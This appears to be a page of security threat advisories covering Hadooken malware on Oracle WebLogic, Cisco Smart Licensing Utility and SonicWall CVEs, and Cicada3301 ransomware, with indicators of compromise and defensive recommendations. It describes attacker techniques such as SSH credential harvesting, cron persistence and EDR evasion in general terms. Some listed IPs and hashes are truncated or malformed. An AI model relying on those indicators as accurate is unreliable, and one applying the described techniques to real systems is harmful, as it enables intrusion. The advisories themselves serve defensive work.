Hadooken Malware Targeting Oracle WebLogic

Hadooken Malware Targeting Oracle WebLogic

DOWNLOAD PDF

SUMMARY

A new malware campaign was recently identified that targets Linux environments, focusing on crypto-mining and botnet malware deployment. This operation specifically targets Oracle Weblogic servers to deliver a malware strain called “Hadooken,” as reported by cloud security firm Aqua. “When Hadooken is executed, it installs Tsunami malware and deploys a crypto miner.”

 

TECHNICAL DETAILS

Oracle WebLogic Server is an enterprise-level Java EE application server, widely used for building, deploying, and managing large-scale distributed applications. It is popular in banking, e-commerce, and critical business systems due to its support for Java, transaction management, and scalability. WebLogic is often targeted in cyberattacks, primarily due to vulnerabilities such as deserialization flaws, improper access controls, and common misconfigurations – examples include weak credentials or exposed admin consoles.  These weaknesses can lead to severe risks, including remote code execution (RCE), privilege escalation, and data breaches, especially if systems are not properly patched or secured.

The recent attack campaign leverages these vulnerabilities and configuration weaknesses to gain an initial foothold and execute arbitrary code on vulnerable WebLogic instances. The attack begins by deploying two nearly identical payloads: one written in Python and the other as a shell script. These payloads retrieve the “Hadooken” malware from a remote server, with IP addresses “89.185.85[.]102” or “185.174.136[.]204.”

Hadooken Malware Targeting Oracle WebLogic

The shell script version is designed to search directories containing SSH data, including user credentials and host information using this data to launch attacks on other known servers. This enables lateral movement within the compromised environment, spreading Hadooken malware across the network or connected systems.

Hadooken itself consists of two primary components: a cryptocurrency miner and a distributed denial-of-service (DDoS) botnet named “Tsunami” (also known as Kaiten). Tsunami has previously targeted Jenkins and WebLogic services, especially in Kubernetes environments. Once deployed, Hadooken ensures persistence by creating cron jobs that run the crypto miner at regular intervals.

To evade detection, Hadooken employs various defense evasion techniques. It uses Base64-encoded payloads and disguises malicious processes by naming them innocuously as “bash” or “java” to blend with legitimate system activity. Additionally, it deletes artifacts and traces of its execution to avoid detection. The IP address 89.185.85[.]102 is associated with a hosting provider in Germany, Aeza International LTD (AS210644). A report from Uptycs in February 2024 linked this IP to the “8220 Gang”, which exploited vulnerabilities in Apache Log4j and Atlassian Confluence Server and Data Center for cryptocurrency mining. The same infrastructure is now implicated in the Hadooken campaign, reflecting a consistent trend in abusing known enterprise vulnerabilities.

 

INDICATORS OF COMPROMISE (IOCs)

Hashes:

  • cdf3fce392df6fbb3448c5d26c8d053e
  • 4a12098c3799ce17d6d59df86ed1a5b6
  • b9f096559e923787ebb1288c93ce2902
  • 9bea7389b633c331e706995ed4b3999c
  • 8eef5aa6fa9859c71b55c1039f02d2e6
  • c1897ea9457343bd8e73f98a1d85a38f
  • 249871cb1c396241c9fcd0fd8f9ad2ae
  • 73d96a4316182cd6417bdab86d4df1f

Attacker IP:

  • 174.136.204
  • 185.85.102

 

RECOMMENDATIONS

  • Ensure that Oracle WebLogic servers are consistently updated with the latest security patches to close known vulnerabilities like deserialization flaws.
  • Use strong, unique credentials for all admin and user accounts, and disable unnecessary admin interfaces. Implement multi-factor authentication (MFA) where possible.
  • Regularly audit server configurations to identify misconfigurations such as exposed admin consoles and weak credentials. Limit access to sensitive areas like SSH directories.
  • Set up intrusion detection systems (IDS) to monitor unusual traffic, especially from known malicious IP addresses, such as those linked to the Hadooken campaign.
  • Restrict the privileges of user accounts and processes to minimize the impact of potential malware execution.
  • Install and maintain anti-malware tools on all systems to detect and block malicious activities, including crypto miners and botnets like Tsunami.
  • Automate the process of identifying and mitigating vulnerabilities using tools such as vulnerability scanners and patch management solutions.
  • Segment the network to prevent malware from easily moving laterally between systems. Use firewalls and access control lists (ACLs) to enforce boundaries.
  • Maintain comprehensive logging of all system and network activities to detect unusual behaviors, such as unauthorized SSH access or cron job creations.
  • Ensure regular backups of critical systems and test recovery plans to minimize data loss in the event of a malware attack or breach.

 

REFERENCES

How to Run a Tabletop Exercise (The Backup Wrap-up Podcast)

How to Run a Tabletop Exercise (The Backup Wrap-up Podcast)

This episode of The Backup Wrap-up explores the vital role of tabletop exercises in cybersecurity preparedness. Dr. Mike Saylor, CEO of Blackswan Cybersecurity, offers an in-depth look at how to effectively plan and conduct these exercises. We discuss why these simulations are crucial for organizations of any size and how they can significantly enhance incident response capabilities.

Tune in to learn how to choose appropriate scenarios, engage key stakeholders, and foster a constructive learning environment. This podcast also highlights common mistakes to avoid and emphasizes the need for regular practice. Whether you’re just starting with tabletop exercises or aiming to refine your current approach, this episode delivers practical advice to boost your organization’s cyber resilience. Don’t miss out on this chance to elevate your incident response strategy!

Hadooken Malware Targeting Oracle WebLogic

Cisco Smart Licensing Utility Vulnerability

DOWNLOAD PDF

SUMMARY

Cisco recently addressed two critical vulnerabilities (CVE-2024-20439 and CVE-2024-20440) in the Cisco Smart Licensing Utility (CSLU), removing a backdoor administrative account and fixing an information disclosure flaw. These vulnerabilities could allow remote attackers the ability to gain unauthorized administrative access or retrieve sensitive data.  Users are advised to update to the latest version to prevent exploitation.

 

RISK SCORE

CVE-ID                                 CVSSv3 Score

CVE-2024-20439                9.8

CVE-2024-20440                9.8

 

VULNERABILITY DETAILS

CSLU is a Windows-based tool designed to manage licenses and associated products locally, without the need to connect to Cisco’s cloud-based Smart Software Manager.

The first flaw, CVE-2024-20439, involved a backdoor account that allowed unauthorized attackers to log in with administrative privileges using static, hardcoded credentials, through the API of the Cisco Smart Licensing Utility application. This vulnerability was particularly dangerous and allowed attackers to gain full access to systems remotely without authentication.

The second flaw, CVE-2024-20440, involved the exposure of sensitive log files containing API credentials, accessible through crafted HTTP requests. This vulnerability impacted only certain versions of the CSLU and posed a significant risk by leaking sensitive data that could be used in further attacks.

 

AFFECTED PRODUCTS

  • Cisco Smart License Utility 2.0.0, 2.1.0, and 2.2.0

 

REMEDIATION

  • Update to Cisco Smart License Utility 2.3.0 or later.

 

REFERENCES

 

 

Hadooken Malware Targeting Oracle WebLogic

SonicWall Firewall Vulnerability

DOWNLOAD PDF

SUMMARY

SonicWall’s self-disclosed critical security vulnerability in SonicOS is now under active exploitation.  Available updates should be applied as soon as possible. The vulnerability (CVE-2024-40766) has a CVSS score of 9.3 out of 10 and stems from improper access control in the SonicOS management interface and SSLVPN, which could allow unauthorized access to resources and, under certain conditions, trigger a firewall crash.

 

TECHNICAL DETAILS

CVE-2024-40766 is a critical access control vulnerability with a CVSS v3 score of 9.3, affecting multiple generations of SonicWall Firewall devices, including Gen 5, Gen 6, and Gen 7 models. The flaw, initially disclosed on August 22, 2024, affects the management interface of SonicOS, but recent updates indicate it also impacts the SSLVPN feature. The vulnerability could allow unauthorized resource access and may also lead to firewall crashes.

 

AFFECTED DEVICES AND VERSIONS

  • SonicWall Gen 5 running SonicOS version 5.9.2.14-12o and older: Fixed in SonicOS version 5.9.2.14-13o.
  • SonicWall Gen 6 running SonicOS version 6.5.4.14-109n and older: Fixed in 6.5.2.8-2n (for SM9800, NSsp 12400, NSsp 12800) and 6.5.4.15-116n (for other Gen 6 firewalls).
  • SonicWall Gen 7 running SonicOS version 7.0.1-5035 and older: The issue is not reproducible in version 7.0.1-5035 and later.

 

SonicWall has not provided detailed technical information on how the vulnerability is exploited but highlights its potential to allow unauthorized access and cause firewall failures, which could leave corporate networks exposed. Given that SonicWall firewalls are often accessible via the internet for VPN services, they are prime targets for exploitation.

 

RECOMMENDATIONS

SonicWall’s critical steps for securing devices against CVE-2024-40766.

  • Restrict SonicOS management portal access to trusted sources only. Disabling internet access to the WAN management portal entirely can significantly reduce exposure.
  • Only allow SSLVPN access from trusted sources. If SSLVPN functionality is not required, disable it to further reduce attack surface.
  • For Gen 5 and Gen 6 devices, administrators should enforce immediate password changes for SSLVPN users with local accounts. The “User must change password” option should also be enabled for all local users.
  • Activate MFA for all SSLVPN users to add an additional layer of security. SonicWall supports MFA using Time-based One-Time Passwords (TOTP) or email-based OTPs, providing stronger protection against unauthorized access. Detailed configuration instructions for MFA are available on SonicWall’s support portal.
  • Ensure that all affected devices are running the latest patched firmware versions as outlined above. Regularly check for firmware updates and apply them promptly to mitigate known vulnerabilities.

 

REFERENCES

 

 

Hadooken Malware Targeting Oracle WebLogic

Cicada3301 Ransomware Targeting Linux-Based ESXi Servers

DOWNLOAD PDF

SUMMARY

A ransomware-as-a-service (RaaS) operation is posing as the legitimate Cicada 3301 organization and has already listed 19 victims on its extortion site. The new ransomware is employing techniques similar to BlackCat ransomware did. It uses robust encryption methods, exploits system utilities to disable security measures. The ransomware is distributed via a RaaS platform and targets a wide range of file extensions.

 

TECHNICAL DETAILS

Cicada3301 is a new ransomware variant, first seen in June 2024 and has been active in exploiting vulnerabilities in small to medium-sized businesses (SMBs). This ransomware is written in Rust, allowing it to operate on both Windows and Linux/ESXi platforms, showcasing its versatility and broader attack surface. Cicada3301 operates under a ransomware-as-a-service (RaaS) model, with its developers actively recruiting affiliates on underground forums.

THREAT ADVISORY

Cicada3301 incorporates several advanced features from BlackCat, such as using ChaCha20 for encryption and manipulating system utilities like fsutil, IISReset.exe, and wevtutil to disrupt system recovery and erase traces of its activity.  Additionally, it can execute remote commands using embedded credentials via PsExec, enhance network traffic capacity for malicious operations, and terminate processes related to backup and recovery to prevent data restoration.

The ransomware specifically targets a range of 35 file extensions important to enterprise operations, ensuring the encryption of valuable data, including: sql, doc, rtf, xls, jpg, jpeg, psd, docm, xlsm, ods, ppsx, png, raw, dotx, xltx, pptx, ppsm, gif, bmp, dotm, xltm, pptm, odp, webp, pdf, odt, xlsb, ptox, mdf, tiff, docx, xlsx, xlam, potm, and txt.

The use of the EDRSandBlast tool was also used by Cicada3301 to exploit vulnerabilities in signed drivers, a technique previously used by the BlackByte group, to evade endpoint detection and response (EDR) systems.

 

INDICATORS OF COMPROMISE (IOCs)

SHA-1:

  • c08a863c2e5288d4ce2a9d46a725518f12711a7
  • 54a8fe5c70ed0007fdd346a9a75977fd9f8ad24a

 

RECOMMENDATIONS

  • Utilize advanced endpoint protection solutions to detect and block ransomware behaviors, including the misuse of legitimate tools for malicious activities.
  • Ensure all systems and software are regularly updated to patch vulnerabilities that could serve as entry points for ransomware.
  • Maintain frequent backups of critical data, and regularly test recovery processes to confirm they are effective in ransomware scenarios.
  • Implement network segmentation to contain the spread of ransomware within isolated network segments.
  • Enforce policies that restrict the execution of scripts, such as PowerShell, that attackers commonly exploit.
  • Conduct user training to raise awareness of phishing risks and strengthen defenses against social engineering attacks.
  • Deploy continuous monitoring tools to identify early indicators of compromise and enable rapid response to mitigate threats.
  • Secure and monitor the use of administrative tools like PsExec, ensuring that management interfaces are not publicly accessible.

 

REFERENCES